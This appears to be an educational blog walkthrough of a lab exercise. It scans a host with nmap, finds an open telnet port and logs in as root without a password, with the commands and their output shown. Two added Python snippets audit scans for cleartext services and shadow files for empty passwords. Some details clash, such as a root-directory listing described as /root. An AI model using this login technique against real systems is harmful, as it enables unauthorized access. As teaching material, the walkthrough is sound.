In the dynamic and complex realm of cybersecurity, the initial stages of a penetration test or any security evaluation are crucial. This journey begins with a critical process known as Enumeration, a meticulous step where understanding the target’s current state is paramount. The essence of Enumeration lies in gathering extensive knowledge about the target, forming the foundation for subsequent actions.

Entering the Target’s Virtual Realm

Imagine you’ve just gained access to the same network as your target. This is akin to having a direct line to the target, much like any regular user. Picture this: if your target is a web server hosting a public webpage, you’re just an IP address away from exploring its digital contents. And if it’s a storage server, the same IP can be your gateway to its digital vaults, given you have the right keys (credentials, in this case).

However, uncovering the target’s services isn’t a task for the impatient. It’s not about manual searches, which are time-consuming and impractical. Here’s where the understanding of server ports comes into play. Every server communicates and offers its services through these digital doorways. The initial steps in the Enumeration phase involve a systematic scan of these open ports. This scan isn’t just about identifying the target’s role in the network; it’s about uncovering potential vulnerabilities hidden within the services it runs.

Enumeration

First, we can ping the target’s IP address to check whether our packets reach their destination and whether we receive any response back:

$ ping 10.10.1.68

PING 10.10.1.68 (10.10.1.68) 56(84) bytes of data.
64 bytes from 10.10.1.68: icmp_seq=1 ttl=63 time=11.1 ms
64 bytes from 10.10.1.68: icmp_seq=2 ttl=63 time=889 ms
64 bytes from 10.10.1.68: icmp_seq=3 ttl=63 time=12.6 ms
64 bytes from 10.10.1.68: icmp_seq=4 ttl=63 time=83.0 ms
64 bytes from 10.10.1.68: icmp_seq=5 ttl=63 time=17.4 ms
64 bytes from 10.10.1.68: icmp_seq=6 ttl=63 time=254 ms
^C
--- 10.10.1.68 ping statistics ---
7 packets transmitted, 6 received, 14.2857% packet loss, time 6006ms
rtt min/avg/max/mdev = 11.104/211.160/889.162/314.884 ms

Receiving successful responses confirms that our connection to the target is active and reliable. To stop the ping process, press CTRL+C on your keyboard. This returns control of the terminal and lets us move to the next crucial step: port scanning.

To begin scanning the target’s open ports, we use the nmap tool. Nmap, short for Network Mapper, sends probes to the target’s ports and identifies which ones are open. Some ports are associated with specific services by default, while others may carry non-standard services. To accurately identify the services actually running on these ports, we use the service and version detection flag -sV, which reports both the name and a description of the software detected. Accurate service identification at this stage is crucial for the rest of the security evaluation.

$ sudo nmap -sV 10.10.1.68

[sudo] password for wirepost: 
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-17 20:05 GMT
Nmap scan report for 10.10.1.68
Host is up (0.93s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
23/tcp open  telnet  Linux telnetd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.54 seconds
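As an added example (not part of the original post), the following Python parses the port table of `nmap -sV` normal output like the report above and flags open services that carry credentials in cleartext, which is the triage a defender would do on such a scan. The sample report is constructed: the telnet line mirrors the post's result, and the ftp and ssh lines are added for illustration.

```python
import re

# Constructed sample of `nmap -sV` normal output. The telnet line mirrors the
# scan in the post; the ftp and ssh lines are added for illustration.
SAMPLE_NMAP = """\
Nmap scan report for 10.10.1.68
Host is up (0.93s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
23/tcp open  telnet  Linux telnetd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
"""

# Protocols that send credentials without encryption; each open instance is a
# finding to remediate (disable it, or replace it with SSH/SFTP).
CLEARTEXT_SERVICES = {"telnet", "ftp", "rlogin", "rsh", "rexec", "tftp"}

# Matches "PORT/PROTO STATE SERVICE [VERSION]"; VERSION is optional and may
# contain spaces, so it is captured greedily at the end of the line.
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_nmap_ports(report):
    """Return one dict per port line found in nmap's normal-output table."""
    ports = []
    for line in report.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            port, proto, state, service, version = m.groups()
            ports.append({"port": int(port), "proto": proto, "state": state,
                          "service": service, "version": version.strip()})
    return ports


def cleartext_findings(report):
    """Open ports whose detected service is a known cleartext protocol."""
    return [p for p in parse_nmap_ports(report)
            if p["state"] == "open" and p["service"] in CLEARTEXT_SERVICES]


if __name__ == "__main__":
    for f in cleartext_findings(SAMPLE_NMAP):
        print(f"{f['port']}/{f['proto']} {f['service']} "
              f"({f['version'] or 'unknown version'}): cleartext protocol, "
              "credentials are exposed on the wire")
```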

Having found port 23, which is used for Telnet, the next step would typically be to connect to the Telnet service on the target system and check for potential weaknesses, such as default credentials or unsecured access.

Telnet is a network protocol used for providing a command-line interface for communication with a remote device or server, primarily used for accessing and managing devices remotely. However, it is known for being insecure as it transmits data, including login credentials, in plain text, making it susceptible to eavesdropping.

At times, specific accounts may inadvertently be left without passwords due to setup errors, aiming for quick access. This oversight often affects network devices or systems, making them prone to straightforward brute-force attacks. In such scenarios, an attacker tries various login attempts using a series of common usernames, omitting the password field entirely.

To explore whether these accounts might be operational with empty passwords, one approach is to input these usernames directly into the terminal upon request during the login process. If dealing with a more extensive list of potential usernames, automating this task with a script that uses a username wordlist (and possibly a password list) would be more efficient.

The wordlists for this purpose often contain common personal names, common terms, or information sourced from past security breaches. In this specific scenario, a practical first step is to manually test a few usernames to see if they provide access.
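As an added defensive check (not part of the original post), this Python audits shadow(5) records for the misconfiguration the text describes: accounts whose password field is empty, which is what lets a login succeed without ever being asked for a password. The shadow content is constructed sample data and the hash value is a placeholder.

```python
from dataclasses import dataclass

# Constructed sample /etc/shadow content (not from the original post). Field 2
# is the password field: empty means no password is required, a leading '!' or
# '*' means the account is locked, anything else is a hash (placeholder here).
SAMPLE_SHADOW = """\
root::19000:0:99999:7:::
daemon:*:18900:0:99999:7:::
alice:$6$saltsalt$PLACEHOLDER_HASH_NOT_REAL:19000:0:99999:7:::
bob:!:19000:0:99999:7:::
svc::19000:0:99999:7:::
"""


@dataclass
class ShadowEntry:
    user: str
    state: str  # one of: empty, locked, hashed, malformed


def classify_shadow_line(line):
    """Classify one shadow(5) record by its password field."""
    fields = line.rstrip("\n").split(":")
    if len(fields) < 2 or not fields[0]:
        return ShadowEntry(line.strip(), "malformed")
    user, pw = fields[0], fields[1]
    if pw == "":
        return ShadowEntry(user, "empty")
    if pw.startswith(("!", "*")):
        return ShadowEntry(user, "locked")
    return ShadowEntry(user, "hashed")


def passwordless_accounts(shadow_text):
    """Usernames that can log in with no password at all."""
    entries = (classify_shadow_line(l) for l in shadow_text.splitlines() if l.strip())
    return [e.user for e in entries if e.state == "empty"]


if __name__ == "__main__":
    # On a real host run this as root against /etc/shadow; the equivalent
    # one-line shell check is:  awk -F: '$2 == "" {print $1}' /etc/shadow
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_SHADOW
    for user in passwordless_accounts(text):
        print(f"{user}: empty password field; set a password or lock it (passwd -l {user})")
```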

$ telnet 10.10.1.68

Trying 10.10.1.68...
Connected to 10.10.1.68.
Escape character is '^]'.



Admin login: root
Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed 15 Jan 2024 09:35:17 PM UTC

  System load:           0.0
  Usage of /:            41.7% of 7.75GB
  Memory usage:          4%
  Swap usage:            0%
  Processes:             137
  Users logged in:       0
  IPv4 address for eth0: 10.10.1.68
  IPv6 address for eth0: dead:beef::250:56ff:fe96:6490

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

75 updates can be applied immediately.
31 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Mon Sep  7 12:13:24 UTC 2021 from 10.10.1.23 on pts/0
root@Admin:~#

Now that we have root access we can do whatever we want on the system; we can even access the /root directory and list what is in there:

$ ll
   r-xr-xr-x     1   root   root    166 B     Tue Jan 16 12:49:43 2024  ./
   r-xr-xr-x     1   root   root    166 B     Tue Jan 16 12:49:43 2024  ../
   r-xr-xr-x     1   root   root      0 B     Fri Jul 21 01:00:00 2023  afs/
   rwxrwxrwx     1   root   root      7 B     Fri Jul 21 01:00:00 2023  bin  ⇒ usr/bin
   r-xr-xr-x     6   root   root      4 KiB   Tue Jan 16 12:52:56 2024  boot/
   rwxr-xr-x    22   root   root      4 KiB   Wed Jan 12 19:06:32 2024  dev/
   rwxr-xr-x     1   root   root      5 KiB   Wed Jan 12 20:12:33 2024  etc/
   rwxr-xr-x     1   root   root     12 B     Fri Jul 21 01:00:00 2023  home/
   rwxrwxrwx     1   root   root      7 B     Fri Jul 21 01:00:00 2023  lib  ⇒ usr/lib
   rwxrwxrwx     1   root   root      9 B     Fri Jul 21 01:00:00 2023  lib64  ⇒ usr/lib64
   rwx------     1   root   root      0 B     Thu Apr 13 22:42:06 2023  lost+found/
   rwxr-xr-x     1   root   root      0 B     Fri Jul 21 01:00:00 2023  media/
   rwxr-xr-x     1   root   root      0 B     Fri Jul 21 01:00:00 2023  mnt/
   rwxr-xr-x     1   root   root    368 B     Fri Dec 15 00:48:52 2023  opt/
   r-xr-xr-x   766   root   root      0 B     Wed Jan 12 10:05:22 2024  proc/
   r-xr-x---     1   root   root    286 B     Sun Jan 14 14:49:59 2024  root/
   rwxr-xr-x    52   root   root      1 KiB   Wed Jan 12 20:12:33 2024  run/
   rwxrwxrwx     1   root   root      8 B     Fri Jul 21 01:00:00 2023  sbin  ⇒ usr/sbin
   rwxrwxrwx     1   root   root     19 B     Thu Sep 21 21:50:14 2023  snap  ⇒ /var/lib/snapd/snap
   rwxr-xr-x     1   root   root      0 B     Fri Jul 21 01:00:00 2023  srv/
   r-xr-xr-x    13   root   root      0 B     Wed Jan 12 10:06:22 2024  sys/
   rwxrwxrwt    34   root   root    920 B     Wed Jan 12 20:32:41 2024  tmp/
   rwxr-xr-x     1   root   root    200 B     Sat Dec  2 18:07:20 2023  usr/
   rwxr-xr-x     1   root   root    208 B     Sat Dec  2 18:25:20 2023  var/

Gaining root access to a system, as illustrated in the provided Telnet session, underscores a crucial point about cybersecurity: the peril of leaving systems unprotected. This scenario, where access was attained with minimal resistance, exemplifies a significant lapse in security protocols that can lead to dire consequences.

Understanding the Risks of Unprotected Systems

  1. Unrestricted Access: The ease with which root access was obtained in this case highlights how simple oversights, such as not securing login credentials, can leave a system wide open for unauthorized access. Root access means complete control over the system, allowing an intruder to manipulate, steal, or destroy data.
  2. Potential for Widespread Damage: With root access, attackers can install malicious software, create backdoors for future access, or even use the compromised system as a launchpad for attacks on other systems. The potential for damage is enormous, ranging from financial loss to legal liabilities and reputation damage.
  3. Data Breach and Privacy Violations: An unprotected system is a treasure trove for cybercriminals. It can lead to significant data breaches, exposing sensitive information such as personal data, financial records, or confidential business information.
  4. Compliance and Legal Issues: Many industries have strict regulations regarding data protection and privacy. An unprotected system not only poses security risks but also legal and compliance risks, which can result in hefty fines and legal repercussions.
  5. Loss of Trust: For businesses, a security breach can lead to a loss of customer trust, which is often more devastating than the immediate financial impact. Restoring reputation and customer confidence can be a lengthy and challenging process.

Conclusion: The Imperative of Robust Cybersecurity

The scenario of gaining root access with minimal effort is a stark reminder of the critical importance of robust cybersecurity measures. It’s essential for individuals and organizations to recognize the risks of leaving systems unprotected and to take proactive steps to secure their digital assets. This includes regular security audits, implementing strong password policies, keeping systems updated, and educating users about security best practices.

In today’s digital age, where cyber threats are ever-evolving, the cost of complacency can be extraordinarily high. Protecting digital assets is not just a technical necessity but a fundamental responsibility to safeguard data, privacy, and the integrity of systems and networks.

Disclaimer

The content presented in this blog post is intended for educational and informational purposes only. The scenarios and methods described are based on hypothetical situations in a controlled environment and should not be replicated or interpreted as encouragement for unauthorized or illegal activities.

Readers are advised that accessing, probing, or manipulating computer systems without explicit permission is illegal and unethical. The author and publisher of this blog bear no responsibility for any misuse of the information provided.

This post aims to raise awareness about cybersecurity risks and the importance of implementing strong security measures. It is crucial for individuals and organizations to adhere to legal and ethical standards in all cybersecurity activities.